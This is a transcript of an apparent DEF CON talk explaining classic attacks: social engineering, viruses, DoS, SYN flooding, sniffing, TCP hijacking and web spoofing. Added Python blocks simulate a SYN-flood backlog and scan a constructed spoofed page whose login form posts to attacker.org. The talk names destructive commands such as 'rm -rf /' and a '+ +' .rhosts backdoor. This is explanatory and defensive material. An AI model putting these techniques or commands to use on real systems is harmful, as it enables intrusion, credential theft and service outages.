Attacks and concepts and ideas based on how relevant I think they are in today's world. I've tried to pick up stuff that would be applicable to most companies, to most organizations, and may affect the most people around here. So we can get started. Just to put things into context, I've traveled here all the way from India. It's been a long, sleepless, and tiring flight. Not to mention extremely expensive, but I think I'm going to have a good time here and I hope you enjoy this session as much as I do. Okay, now you've kind of lost me, I'll have to... Another thing to mention is just because I'm here from India, it doesn't mean that this session is going to cover stuff like how to protect yourself from a malicious snake charmer, or how not to get trampled on by an elephant when you get out of your car. That's the stuff I cover in the pre-free newbie session. With every passing day, this first slide keeps getting more redundant, but it serves as an excellent starting point, so why worry about security? I'm sorry if this thing is a little unclear; what this is meant to illustrate is when a cartoonist takes security seriously, then things are serious. The only problem in this particular thing, for those of you who can't read it, can you read it at the back there? No, okay. It really shows two guys sitting in front of a computer monitor, and the machine's connected to the internet, and the red bubble that's coming through is hackers, and one guy tells the other guy, listen, brace yourself, here comes another one, okay? The only thing wrong with this is the hackers are really the good guys. That bubble should have been crackers, but what the heck? I mean, a picture's worth a thousand words, and this was what I located on the net. Okay, if you really look at it, what are you trying to protect? Every time you get online, every time you get connected, what are the main issues that one has to keep in mind? Information privacy.
You're here at DEF CON, and you send a mail back to your girlfriend saying that, listen, I'm enjoying myself, but I'm missing you a hell of a lot. Now, you don't want people to read that mail. It could be something personal. It could be something to do with business. Information privacy is information privacy. Data integrity. You definitely don't want your mail to be modified while it's traveling to her. And resource availability. You suddenly realize, oops, it's her birthday tonight, and I've been to the DJ get-together, and it's five to 12 now. I need to get onto my email, web email, and shoot off a mail. And you try connecting. Let's assume the wireless network is working perfectly. You try connecting from here, and you find connecting to Hotmail, connecting to Hotmail. No connection. Why? Because Hotmail is under a denial of service attack at that time. So resource availability. You just don't have it when you need it. Okay. How would you classify people who are out there, people and things that are out there who might try to make life miserable? Broad categories would be, you know, the human being, the human aspect itself. And the second one would be the digital machine. Stuff that is programmed. Okay, let's look at human and social engineering. It seems very trivial to talk of such stuff at a technical conference like DEF CON. But my submission here is, if something works, then the simpler it is, the better it is. And this is stuff that really happens and really affects people. I don't know about life too much in the United States, but back there in India, the internet has penetrated... I mean, you have phenomenal software guys sitting in India, but if you look at the percentage of the population who actually are connected to the net compared to the population of the country, it's minuscule. Now, even the people who get on to the net know very little about the real dangers that lurk online.
What happens in a lot of cases is, for example, there are students who come to study here in the US to pursue studies, who come and work over here. The last thing they probably do before they leave home is to buy a computer for their parents, hook them up to the local ISP, show them how to get online, show them how to use email and chat. Now, these people, their parents, I mean, people of a generation who've never used computers, okay, you've put them on and you've connected them to the big, bad world. Till about two years ago, getting an internet connection in India was expensive. I mean, 15,000 rupees is what it started with. If you translated, it would be about, what, $300 a month? $300 for 500 hours or some nonsense like that. So there was motivation for people to try and get passwords and use those as dial-up accounts. It's no longer the case now, but I'm saying the motivation existed. So you had cases like, for example, you got an email from the administrator which said, listen, you've not changed your password in so many days. We are going through security maintenance procedures here. Would you please reset your password to A, B, C, 1, 2, 3, 4? Okay, and you would have people who actually reset it. So it's almost like a brute force method. I transmit to a huge number of people on the server and then I simply either write a small script or I go ahead and try and log in manually and find out which accounts have now been compromised. Again, a picture will say it better than a lot of words. This is rather clear, right? I mean, it does really encapsulate what I just said. Okay, posing. You have a fairly large organization. You've got a building with multiple floors and they're all connected and you don't know everybody around there. And I come around saying, listen, I'm the network administrator. There seems to be something wrong with your machine. Sit down, play with the machine, have a floppy with me, install a back door or a trojan, go away. It could happen.
It does happen. If you don't think posing is too technical, you could term it as human spoofing. Okay, I've walked in as someone else. Dumpster diving. Everybody's heard about it. Throw stuff away. The last point is really the most important. You have a disgruntled employee and you've got a bad enemy, because the guy is sitting inside of your organization. Most people protect their organization with a fence outside, an electronic or digital fence. What do you do inside? Very, very few people take enough security precautions within an organization, and 65% of attacks happening from inside was the figure from a study which happened maybe one and a half years ago. I actually think the number is probably higher. Maybe 75%, 80% of the attacks originate because of inside information. Okay, now to the slightly more interesting stuff. The programmable dangers today include this entire list that is out there, starting from viruses and back doors and denial of service attacks and sniffing and spoofing. Viruses and worms. My opinion, this is the biggest threat and the worst pain in the butt for most corporations. Very simple. To use or... I mean, I don't need to get into your machine when you are online, try and get the root password and then do a rm -rf slash or del star dot star from slash. That's complex. What if I could simply send you an email which contained a piece of malicious code which did exactly that? Okay, the mail comes to you from someone you know. There's an attachment on it, you click it, or there's a program which, you know, kind of is supposed to do something else, you click on it and it actually launches a piece of virus which goes and sits in your boot sector and toasts your hard disk. So, you have an organization now with, let's say, three, four hundred people and you know how the internet is, right? You kind of keep forwarding jokes and you forward pictures and you forward stuff to each other.
So, something interesting comes into this organization and before you know it, everybody else has got it. Now, why is this so dangerous? Simply because port 25, your mail server port, or the machine that's going to pick up mail from your POP account, is really going to allow connections through 210 to 25. You download stuff off the web. Most firewalls would allow connections to port 80. So, it's really a very loose fence that lies over there and therein lies the danger. You know, people get stuffed down before you know it and it's so easy to write viruses these days. I mean, you've got do-it-yourself kits. You've got Microsoft. So, it's easy. Viruses are actually a super-specialized subject in themselves. I don't know much about it. I'm not very interested in it. So, we'll go ahead to the next one. Excuse me. Okay, Trojans. Everybody heard of Trojans? Trojan horse programs? Yes, no. Wonderful. Pretends to do something useful. And I mean, the slide is self-explanatory. I remember the first time I did this about 10 years ago during post-graduation in software technology, wrote a login emulator into the mainframe. And it was unbelievable the number of passwords one picked up. More importantly, all the guys, or let's say 80% of the guys, you'd know which women they were hot after, simply because that was the password they'd selected. So, the next time you go and log in to your system and it comes back with login failure and the login prompt comes again, ask yourself, listen, was that something else? Or was that me making a typo? Okay. What is a denial of service attack? Anything that prevents the normal function of services, servers, networks, hosts, that cuts you away from resources, can be termed as a DoS. And DoS in principle is not really new. In the olden days where computing power was still looked up to, it was still precious, RAM and CPU were valuable, these things have existed since that time.
So, for example, if I wrote a small script which kind of said, while true, make directory A, change directory into A, and repeat the loop. Okay, what would happen? It would recursively go all the way in. Okay, now let's say on a Unix system, you're limited by the fact that you're a particular user with constraints on what you can use up. But let's say if it was run as root, or in the olden days where limits were not imposed so tightly, you would run out of inodes on the system. Okay, every available inode where you can hook on a directory or a file would be taken up. And in effect, you've done a DoS on the particular machine. The DoS that we are interested in today is a little more advanced. I'm interested in being able to sit here and launch something which kind of goes and does something on a server which is probably sitting in Iceland or Alaska or something, or maybe the other way around. Okay, now there are multiple ways in which you can execute denial of service attacks. One of them is called, let's call it magic packets. The principle here is to send a small, maybe even a single malformed packet to your target host. Now, the malformed packet is what causes the magic to happen, okay? This packet will really break accepted de facto network rules. So for example, the packet could be oversized. If the packet is a TCP packet, there are various control flags that a TCP packet has. You are normally, I mean, these control flags would signify what stage of the connection this entire connection is in itself. Am I making a connection? Am I transmitting? Am I acknowledging? Now, if I could set up flags which were not expected by the remote system, that could be a problem. Injecting out of sequence packets. Now, the reason why this particular attack would succeed is because the TCP/IP stack on the target machine is not stable or robust enough to handle exceptional cases. Anybody heard of WinNuke? It's a very old thing. How many heard of WinNuke? Yeah, not too many, okay.
When Windows 95 actually popped up, it was a nice, good, clean, graphical user interface. That's when this thing was formulated. The way this attack worked was it targeted the Windows machine on port 139, which was the NetBIOS port. It sent the packet with the OOB, the out-of-band flag, marked as on. The remote machine didn't know how to handle it because it was a bug, you know? So the story is like, if you're on IRC and you're chatting with someone and you kind of get into an online virtual argument, and all of a sudden you see the screen go blue, the blue screen of death, and your machine crashes. It's probably, or was probably, a WinNuke packet which was generated. The reason the machine crashed, your Microsoft OS went down, was, anybody? Simple. Whenever a Microsoft program doesn't know what to do, it does what all good Microsoft programs do: it crashes. And the story here is that the minute this thing happened, Microsoft was informed, they released a patch, and it is ridiculous, as the story goes. The patch was like this. If I sent you a WinNuke packet, the payload of the packet contained a particular string. If I recall correctly, it was BEWM. So what Microsoft did in all its wisdom, it filtered anything that came to port 139, had the OOB flag on, and had a payload of BEWM. It silently ignored that. It was a matter of a few hours before WinNuke 2 happened, which completely randomized the payload, put in various other things, and then Microsoft was forced to actually release a real patch. But why WinNuke is so important is it became the first piece of software that used magic packets and was distributed widely over the world. I mean, you had variations where I could set up one attacker shooting to various machines and stuff like that. It was fairly crazy. Another style of DoS is a network saturation attack. As the name implies, you flood a network with so much traffic that machines and routers on that network simply can't handle it anymore.
What happens is they go into high strain trying to route and process the packets as they're coming in. All these packets, because they're illegitimate, are actually taking away resources, bandwidth as well as CPU power. As a result, what happens? Real applications, like web and email and FTP and stuff like that, that legitimate users might want to use, also get affected. A network saturation attack actually affects a large number of people. I might be wanting to target that particular thing for one particular individual or organization, but anybody that's using that network is going to get affected. All networks which are en route between the attacker and the victim would also get affected because of the huge amount of traffic. There are other ways in which you can do DoS. It's really dependent on your imagination and innovation and how much you know of the protocols. Everybody heard of ping? You ping a machine to see if it's alive or not? Now, what happens if I send out a ping packet as a broadcast ping to multiple machines on my subnet, for example? Each of these machines is going to get a ping packet and each of these machines is going to reply back to me. So instead of pinging one machine, I've pinged multiple and I've got multiple replies back. Okay, so where is the trick here? What I could do is, I don't like him. He's my whatever, neighbor, and I know he sits here. I know his IP address. I spoof a ping to a huge network with his IP address. Okay, so what happens is all the machines that receive that ping request actually send a response back and this guy's machine is hit with that. Okay, so things like that. Similarly, SYN flooding. You know, you set up so many connections to a machine, and every machine's got a finite capacity for accepting connections. I mean, it's configured. Now, once you exceed that, any other connection that happens to come to the machine is going to get dropped. We'll be looking at SYN flooding a little later.
Similarly, connection killing and hijacking. You have a running connection between two machines. I can actually try and break it. We'll be looking at both of these. Okay, they say you can't get too much of a good thing. So when you're doing a DoS all by yourself, the next logical step is to have a distributed denial of service, where the principle is simple. It says united, we deny. A plain DoS will have a single point of launch. Okay, so if it is identified that there is a DoS happening from this particular machine off this network, it's easy to filter out those packets. Authorities which actually handle the links and routes can also start dropping those packets. But in a DDoS, you have several launch points. So the typical accepted method is you compromise a huge number of machines based on bugs that may be there. On every compromised machine, you set up a DoS client. The DoS client is triggered eventually with a DoS server. So what happens is at one point in time, I use my DoS server to activate thousands of DoS clients, all of which can then target a particular network or a host or whatever it is that you need to do. Okay, the benefits, with a question mark, depends on which side of the fence you are sitting. Okay, if you're the guy who's doing the DoS, then these are benefits. You can now, I mean, disabling a few individual machines is not going to stop the attack. You can now target larger networks. About, I think, three years ago, when Netscape Corporation was still up and alive and really big, I remember reading somewhere that the total bandwidth that went into the Netscape Corporation's office was greater than the entire international bandwidth that India had. Okay, so in case I needed to, I mean, I was a Microsoft fan and I wanted to knock off Netscape. There was no way I could do anything about it using a DoS. But a DDoS may have been successful. We have had incidents where Yahoo, eBay and stuff, big portals like that, have been knocked off. Am I going too fast?
Is the speed okay? Wonderful. The next thing we're looking at is sniffing. Most corporate networks, okay, are broadcast networks, which means when machines are talking to each other, there is a chance, I mean, everybody actually gets to see the broadcast. In the olden days where you had physical cables connecting and had hubs and switches, it was truly broadcast. I mean, I could see and hear everything that happened on that particular network. Today it's slightly different. Switches make it a little more difficult to sniff, but if they're not configured, they can also be compromised and you can sniff on it. The way it works is you have a sniffer program which puts your network interface card into something known as promiscuous mode. Normally what happens is your machine is going to accept packets that are destined only for it. The minute it goes into promiscuous mode, it's going to accept any packet that travels past it, which is all the broadcast packets. The card will now accept the packet. It will push it up to the sniffer program, and the sniffer program then decides and chooses packets that are of interest to it. What do you think we could use a sniffer for? Most obvious applications? Username and password? What else? Email traffic? What else? Credit card numbers? All of you guys are on this negative trip. How about analyzing network traffic? The good guys really call the sniffer a network analyzer. Characteristics are it's passive. You're just listening. It's not really intruding. So it's fairly difficult to detect it. These are the uses we talked about. If I log every byte that travels on the wire where my machine is, in effect it's a remote key logger, and the last two points, really, that's true. It helps to paint a very accurate picture of the network traffic.
Often the only indications you'll have is when you see that hard disk light beaming and beeping frantically and the CPU load going fairly high, because now this guy is accepting and processing all packets. So it has to write them somewhere if you're going to capture them. It has to process them, so the CPU is very active. Somebody might say, listen, what if I run a ps? Can I get a process listing? Yes, you can. But if the system has been compromised, these programs would have been trojaned and replaced. So you run a ps ax and you would actually see all the processes minus the sniffer. You run an ifconfig, which actually checks the status of your network interface card, and you would see that it is not in promiscuous mode, whereas it really is. Okay. The first one is something that we've already talked about in the first slide, human spoofing. But in reality, it applies in the digital world also. The minute you pretend to be someone else, you've gone into what is termed as a spoofing attack. There are various types. IP, DNS, web, and... Okay. So what is IP spoofing, really? You forge the source IP of your first packet, of your connection packet, of the packet that's actually going to talk to people, with an IP address that is not yours, and you've spoofed or you've pretended to be someone else. The typical method in which a hacker or a cracker might use this is to use... They use a denial of service attack to knock a particular machine off the network if it's not already off. I mean, if there's a machine off and you know that this machine's not alive and it cannot respond to packets, then you don't have to use a DoS, but otherwise you use a DoS, knock a machine off. You masquerade as the machine, talk to the target host. Because you're masquerading as the machine, if there is a trust relationship between these two machines, between the target and the machine which is now knocked off, you can exploit that trust relationship.
A lot of these concepts and ideas really work together in harmony to create a completely successful attack. So when we talk of IP spoofing, I can use IP spoofing for SYN flooding and use that as a denial of service attack. The idea is you have two machines, A and B. This thing is termed as non-blind simply because it happens to be on the subnet, so I can actually see packets traveling between the two. Let's assume I knock A off the network. A can no longer respond. I've used a DoS, or the machine is off, or someone's not there. That machine is off. Now I want to target B. What I really do is I send it packets impersonating machine A. Now really what's going to happen is every packet, every connection that is initiated, is going to go with the SYN flag on. In my packet it says I want to... This is my initial packet. I want to synchronize the connection with you. B gets that connection. How many people have heard of the three-way handshake? TCP three-way handshake? Okay. So it's really exploiting the TCP three-way handshake. A packet supposed to have come from A goes to B with a SYN flag on. B accepts the connection. It responds back with its own packet, saying that, okay, I'm also going to synchronize. This is my initial sequence number, switches on his SYN flag, and he acknowledges the first packet from A. Now in reality, A is not alive. Okay? So this packet has gone back to A. If A were alive, A would respond with its own acknowledgement. One, two, three. The three-way handshake would have taken place and that would be the start of the connection. Now since A is not on, B is going to go into a time-out stage. Now while B is waiting for an acknowledgement to come, he's actually got a data buffer in memory, which logs the state of all connections that are still pending, all connections that have not been picked up by the application. Now this queue, which we will call the backlog, is of finite size.
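The finite backlog just described can be simulated. The following is an added example, not code from the talk: host B keeps half-open entries for a fixed time, SYNs carrying the address of a host that cannot answer fill the queue, a live client's SYN is then dropped, and it succeeds only after the entries time out. Backlog size, timeout, host names and sequence numbers are constructed values.

```python
from dataclasses import dataclass, field

SYN, SYN_ACK, ACK = "SYN", "SYN-ACK", "ACK"


@dataclass
class Packet:
    src: str
    dst: str
    flags: str
    seq: int
    ack: int = 0
    t: float = 0.0   # simulated send time in seconds


@dataclass
class Listener:
    """Host B: a listening TCP socket with a finite backlog of half-open connections."""
    addr: str
    backlog_size: int
    timeout: float          # how long B keeps a half-open entry before giving up on it
    isn: int = 1000         # B's next initial sequence number (constructed, not random)
    half_open: dict = field(default_factory=dict)  # (peer, peer_seq+1) -> (expected ack, expiry)
    established: int = 0
    dropped: int = 0

    def expire(self, now):
        """Forget half-open entries whose timer has run out; this is the only way they leave."""
        for key, (_, expiry) in list(self.half_open.items()):
            if expiry <= now:
                del self.half_open[key]

    def receive(self, pkt):
        """Process one inbound packet and return B's reply, or None."""
        self.expire(pkt.t)
        if pkt.flags == SYN:
            if len(self.half_open) >= self.backlog_size:
                self.dropped += 1           # backlog full: the SYN is silently discarded
                return None
            self.isn += 1
            self.half_open[(pkt.src, pkt.seq + 1)] = (self.isn + 1, pkt.t + self.timeout)
            return Packet(self.addr, pkt.src, SYN_ACK, seq=self.isn, ack=pkt.seq + 1, t=pkt.t)
        if pkt.flags == ACK:
            key = (pkt.src, pkt.seq)
            entry = self.half_open.get(key)
            if entry and entry[0] == pkt.ack:
                del self.half_open[key]     # third leg of the handshake: connection is up
                self.established += 1
        return None


def complete_handshake(listener, client, seq, t):
    """A live client: send SYN and, if B answers SYN-ACK, send the final ACK. True on success."""
    syn_ack = listener.receive(Packet(client, listener.addr, SYN, seq=seq, t=t))
    if syn_ack is None:
        return False                        # B dropped our SYN
    listener.receive(Packet(client, listener.addr, ACK,
                            seq=syn_ack.ack, ack=syn_ack.seq + 1, t=t))
    return True


def spoofed_syn_flood(listener, dead_host, count, t):
    """SYNs carrying A's address. A is off the network, so B's SYN-ACKs go unanswered."""
    for i in range(count):
        listener.receive(Packet(dead_host, listener.addr, SYN, seq=5000 + i, t=t))


def run_scenario(backlog_size=5, timeout=30.0):
    """Return (client connected during flood, half-open entries then, connected after timeout)."""
    b = Listener("B", backlog_size, timeout)
    spoofed_syn_flood(b, "A", backlog_size, t=0.0)
    during = complete_handshake(b, "C", seq=42, t=1.0)
    half_open_during = len(b.half_open)
    after = complete_handshake(b, "C", seq=43, t=timeout + 1.0)
    return during, half_open_during, after


if __name__ == "__main__":
    print(run_scenario())   # (False, 5, True)
```

Because nothing but the timer frees a half-open entry, the attacker only has to send a fresh batch of spoofed SYNs before the timeout to keep the listener closed to everyone.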
If I can send enough SYN connections and fill up this queue, B is actually going to be waiting in that particular state and not accepting any more connections until all of them time out. Now eventually they will time out and it will start accepting connections, but it's trivial for me to keep initiating new connections every few seconds. Okay? So this is called a SYN flooding attack. B is completely knocked off. Okay, this is the problem. One sec. Okay. You can see that A has been knocked off. Host X impersonates A. It causes the backlog of B to be exceeded and B won't accept any more connections. So you've just done a DoS using SYN flooding and IP spoofing. Okay. Now you can use the same principle to actually kill an active connection between two machines. You know that TCP maintains its so-called reliability based on sequence numbers and acknowledgments within an active connection. The sequence numbers actually allow machines to put out-of-order information back into order, to discard duplicates, to make sure the connection is being established with a three-way handshake, breaking with a four-way exchange, and so on and so forth. If I can now compute the sequence and acknowledgments of packets as they travel past my machine... So I sniff the packets. I compute the sequence numbers that are happening, and let's say that I want to now terminate this connection. I can create a packet with the reset flag on, the RST flag. The RST flag, when it is received, only needs to have the correct sequence number. For the machine that receives this flag, it's a signal to tear down the connection immediately. So you have A and B running a connection which is live in real time. I'm sniffing the packets as they go through. I compute the sequence number. I create a fresh packet with the expected sequence number for, let's say, B, the reset flag on, and I inject it onto the network.
Now if your computation is correct, if the timing is correct, if nothing really goes wrong, B is going to accept this. It's going to see the reset flag on. It's going to tear down the connection instantly. All of the packets that come from A into B are simply going to be discarded because they will be assumed to be bogus. In fact, B might even send a reset back. So we will call this an evil reset flag. Now you could do the same thing using the FIN flag. When a machine legitimately wants to shut down a connection, it actually switches the FIN on and sends the packet to the remote machine. The remote machine acknowledges it, and when he is through with whatever he wants to do, he sends his own FIN back. So just the way a three-way handshake sets up a connection, a four-way transaction breaks the connection. The beauty of using a FIN instead of a reset is you will always get an acknowledgement back from the remote guy. So if I've injected a FIN inside and for some reason I don't get an acknowledgement, I don't sniff the acknowledgement from B, I know something went wrong and I can attempt to do that again. The principle is the same. Now you take this one step higher logically. If I can kill a connection, why can't I hijack a connection? So let's assume you've telneted into a particular machine, you're running a shell over there, someone from A has telneted into B; why can't I get in and actually take over the connection and pretend to be A? You can. The way to do it here is to compute the sequence number in... Yeah?
So as a result, what will happen is A will continue transmitting what it had to transmit, but since B has updated his counter, he's going to treat those packets as bogus packets, which leaves A completely confused. Your packets are traveling to B, your packets have got the correct sequence numbers, TCP only cares about the sequence numbers, that's how it's maintaining reliability, and in effect you have actually taken over that connection. So if this were a shell that we're running there, you could simply install a backdoor program, or if the r-commands have been enabled, you could set up a .rhosts file with a plus plus inside it, break the connection. The guy who's sitting on A will probably think, I mean if he's dialed in, for example, or it's a bad connection, or the program's hung, normally people kind of break it and just log in again. So, I mean, real-life breaks do happen; just because the thing happens to break doesn't mean you've been hijacked. But these are ways in which people could take over a running connection. Any particular question so far? Does that mean everybody's understanding? Or does that mean you're not understanding? I'm not going to ask that one. Okay, this one, as you can see, is based on a technical report at Princeton University which happened in 1997, but I believe it is so applicable in real life, the thoughts and the principles, that this is something that I would be very happy to share with you. The idea in web spoofing is that the attacker actually creates a shadow copy of the web, okay, and if you are a victim, when you are surfing, you actually believe you're surfing the real worldwide web, whereas you're actually surfing the web that has been set up by the attacker. Okay, I can almost say the first question somebody says is, hey, you mean somebody's going to copy the entire worldwide web?

No, it's not like that. We will look at what really happens here. If you look at the second point, you know, it's applicable for all spoofing. Spoofing is like a con game. You set up an environment which is convincing, but simply because you're doing spoofing, it's really a false environment, and based on how well you've set up that environment, you're going to affect the behavior of the victim, completely based on contextual cues. Okay, now if this is successful, what does it do? What really happens? This will influence all security-relevant decisions that the victim is going to make. When I say security-relevant, what am I talking about? I'm talking about names and passwords. You might want to log into a service, you might give credit card information, you might accept documents, and we've already seen the dangers of, you know, let's say viruses or malicious programs being embedded in documents. You might accept the accuracy of information. So if you're into trading and you actually are looking at a website which says the shares or the prices of, you know, whatever, VA Linux or Microsoft have gone up or down, and you base decisions on that, these are all security-relevant decisions, and all of these will be affected in this kind of an attack. So why does it work?

Okay, this works because the attacker has very intelligently used context. When you're surfing the web, most experienced surfers behave like drivers, okay? So you're driving on the road, you're not really thinking, I need to press the... most of you guys drive automatic transmission, so I don't need to press the clutch now, or the brake now, and stuff like that. Somebody runs across, you jam it, it's all automatic. Now, exactly in the same fashion, you go to a website, or you see a logo that materializes in front of you, and the mind has subconsciously accepted that you're connected to the server you want to connect to. Okay, so the appearance of the object, the name of the object: manual.doc is manual.doc, the manual for the software that you have just downloaded, or is it something else altogether? For all you know, it might be an executable. Finally, the timing of events. If I fed in www.mybank.com and I get a pop-up which says name and password, simply because of the timing of events I am going to enter the name and the password that is my login into this particular bank. Now if all of these happen, these are the images that are alive: surveillance, obviously, tampering. The brand new Dell or whatever that you order, if I could change the delivery address to mine, the new paid-for machine, and quantity numbers and product numbers and so on and so forth, anything can take place. Now let's look at how it really works. These are the principles on which this particular spoofing attack will work. It's termed a man-in-the-middle attack. I am not sexist, I didn't coin this phrase, it could be a woman-in-the-middle attack, but the idea is: here is the victim, here is the desired web URL, and in the middle is the attacker. So it's a man-in-the-middle attack between a client and server. It works on URL rewriting. So if you go to www.hotmail.com, the page is fetched, all the URLs on that page are rewritten to, let's say, www.attacker.org/www.microsoft.com, whatever else. So every subsequent click on a link will actually go to the attacker's machine first; from there it will go out to the real web, and then information would come back to you after having been tampered with. Now this would work completely with forms, because forms are so closely integrated with the web protocols. You might even see a secure connection indicator light up. Let's say Hotmail now gives you a secure connection into your email box. Sure, you have a secure connection; the only difference is your secure connection is between your machine and the attacker's machine. It's between you and the attacker, and you have the secure connection, the lock going up. So how would this attack actually start? How would you begin it? You would need to have a false link, a false link on some web page. You could transmit a false link using webmail where you've got HTML enabled, or you could even have a poisoned search engine. For example, a search engine has actually indexed a page which seems to contain good information but really serves as a starting point for this kind of an attack. Okay. Okay, let's assume the attack is on the way. The way I've described it so far is fairly effective, okay? It would work. It would be able to take your request, it would be able to pull out your request from the web, translate each of the URLs and feed that back to you. But the attack the way we've talked about is not perfect. Can anybody tell me why? There are still contextual cues that will tell the victim he or she is being attacked. Things like, sorry? Malformed URL, yes. What else? Doesn't anybody surf? So you guys are experienced surfers, okay. It's simple. Every time you move your cursor over a link, when it turns into a hand, you have the status line at the bottom that would reflect the link. So you would actually see www.attacker.org slash the real server. Every time you click on a link, for a brief instant as the browser makes a connection to the remote machine, you will actually see connecting to attacker.org. Now these are things which the victim could see and realize something is going wrong.
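The rewriting described above leaves traces a defender can check for mechanically. The following is an added example, not code from the talk or from the Princeton report: it parses a constructed copy of what a victim would receive, flags link and form targets that point at a foreign host or carry another absolute URL inside their path (the www.attacker.org/real-server pattern), and flags scripts that write to the browser status line. The page contents, host names and function names are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: what a victim's browser would receive from a rewriting
# proxy after asking for www.hotmail.com through it (not a real capture).
SPOOFED_PAGE = """
<html><head><title>Hotmail</title>
<script>
function showfake(u) { window.status = u; return true; }
</script></head>
<body>
<a href="http://www.attacker.org/http://www.hotmail.com/login"
   onmouseover="return showfake('http://www.hotmail.com/login')">Sign in</a>
<a href="http://www.attacker.org/http://www.microsoft.com/">Microsoft</a>
<a href="/help">Help</a>
<form action="https://www.attacker.org/http://www.hotmail.com/auth" method="post">
  <input name="login"><input name="passwd" type="password">
</form>
</body></html>
"""

# An absolute URL sitting inside the path of another URL is the signature of
# the rewriting man-in-the-middle: attacker.org/<real server>.
EMBEDDED_URL = re.compile(r"^/?(https?://\S+)")
# Any assignment to the status line (window.status = ..., status = ...).
STATUS_WRITE = re.compile(r"\bstatus\s*=[^=]")


class PageScanner(HTMLParser):
    """Collect link/form targets, inline scripts and on* handler attributes."""

    def __init__(self):
        super().__init__()
        self.targets = []        # (element, url)
        self.scripts = []        # bodies of <script> elements
        self.handlers = []       # values of onclick=, onmouseover=, ...
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.targets.append(("a", attrs["href"]))
        elif tag == "form" and attrs.get("action"):
            self.targets.append(("form", attrs["action"]))
        elif tag == "script":
            self._in_script = True
        for name, value in attrs.items():
            if name.startswith("on") and value:
                self.handlers.append(value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def audit_page(html, expected_host):
    """Return (kind, where, detail) findings that contradict being on expected_host."""
    scanner = PageScanner()
    scanner.feed(html)
    findings = []
    for element, target in scanner.targets:
        parts = urlparse(target)
        if parts.netloc and parts.netloc != expected_host:
            # Any lock icon would belong to this host, not the one the user typed.
            findings.append(("foreign-host", element, parts.netloc))
        match = EMBEDDED_URL.match(parts.path)
        if match:
            findings.append(("rewritten-url", element, match.group(1)))
    for code in scanner.scripts + scanner.handlers:
        if STATUS_WRITE.search(code):
            findings.append(("status-line-write", "script", code.strip()[:40]))
    return findings


if __name__ == "__main__":
    for finding in audit_page(SPOOFED_PAGE, "www.hotmail.com"):
        print(*finding)
```

The form finding is the one that matters most: the password field posts to the attacker's host over HTTPS, which is exactly the "secure connection between you and the attacker" case above.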
as an attacker what do you do you fall back on the premise that the major browser makers have made life comfortable for you they've let the browser be very customizable so you embed a piece of javascript into your page javascript is allowed to write to the status line okay so this piece of javascript is now going to get rid of both of these problems every time I hover my cursor over a link it's not going to show attacker.org slash whatever it's going to show me what I really expect to see every time I click the link although the browser is connecting to my machine to the attacker's machine it actually shows a connection to the target that you really want to reach so you've overcome obstacle number one any other things you can think of that might be a problem that might give the victim an indication of the attack in progress so it's good there's something even easier than that yeah I'm sorry I can't hear you right sure I'll come to SSL in a moment okay okay once you are connected to a particular site if you realize the top bar the location line actually shows the page that you are on the location line in this case even though the status line has not given me any clues will actually show me that I am at attacker.org slash whatever else once again javascript comes to the rescue you can actually replace the location line completely and the people who did this study in Princeton who did this report they actually made a working model of this thing so the location line also reflected the correct URL the next question most people ask is listen what happens if I go and feed an information into the location line again very valid the javascript will allow me to accept info so I say hotmail.com internally this guy will make a connection via attacker.org so you've suddenly eliminated all visual trace okay there is one more thing that you could do as the gentleman here mentioned what happens if I view the document source the document source is going to show me the presence of 
both of these pieces of javascript and immediately the attack is known my question is in real life how many of you view the document source every time you visit a website not too many let's assume for a moment that all of us got paranoid when we went away after this presentation and we started viewing the document source of every page we visited for the next three days for the moment hypothetically now it would be very clear that there is something going wrong here okay once again javascript is your friend what these guys did was they replaced the menu button on top the menu drop down which shows view document source and they embedded their own stuff so when you went and actually clicked on view document source this guy showed you the real page that had come from the web minus the attacker URL rewritten links and the illusion was complete okay there was no way to get out of it okay so this is completing the illusion this encapsulates the points you just spoke about the remedies that were suggested are things like disable javascript be very alert look at the URL lines look at the location lines the recommended software enhancement so when you're doing an SSL kind of connect instead of simply having an indicator which kind of you know you have a lock which is on how about if that guy actually said I am connected to Microsoft.com because your information exchange would have that kind of information I'm sure that's true I completely agree see it's a unfortunately there are these two things the good and the evil so you have a lot of good with javascript I understand that all I'm saying is that the same tool can be utilized for evil also so somewhere it's a fine line somewhere you kind of decide you know I mean if you know nobody's really going to target your grandmom and there's really nothing tougher there you keep it available yeah I'm not very sure java would be more difficult to do simply because of the sandbox rules for example on linux now conqueror lets you 
specify per site enabling of let's say I could enable javascript on a per site basis I could enable java on a per URL basis so if you know you are connecting to a trusted source you may choose to enable it over there but the recommendation would be by default disable and then enable only small okay what are normal regular counter measures most of these things that we spoke about actually arise out of ignorance pure and simple ignorance so user awareness is very critical in an organization you need to set up policies things you put down on paper would say I will let my employees serve only at this time I will let these sites be available I will allow email to happen or I won't allow email to happen put up things like password titaners so you won't kind of simply put in girlfriend names pet names and so on and so forth set up expiry dates completely avoid clear text programs if you're doing any kind of terminal work you're logging into systems who are we telling it okay use SSH bypass FTP okay now the next three or four slides really I'm not sure if we have time to get into because I've just been told I've got something like two and a half minutes left but my next four or five slides actually talked a little bit about firewalls what kind of things you can apply for those of you are interested if you send me an email I'll try and make sure the presentation is available online next two minutes should we just take up questions if any yes right when I was talking sniffing I actually meant being able to read the low level packet so it's not so much about spoofing using email on a switch network what would happen is the device the physical device is a little more intelligent so even if you've got 50 machines connected it would route information only between the two required machines right which is why it becomes difficult to sniff on a switch network but I believe you can do things like ARP spoofing so a level lower than than your IP level for example so every time a 
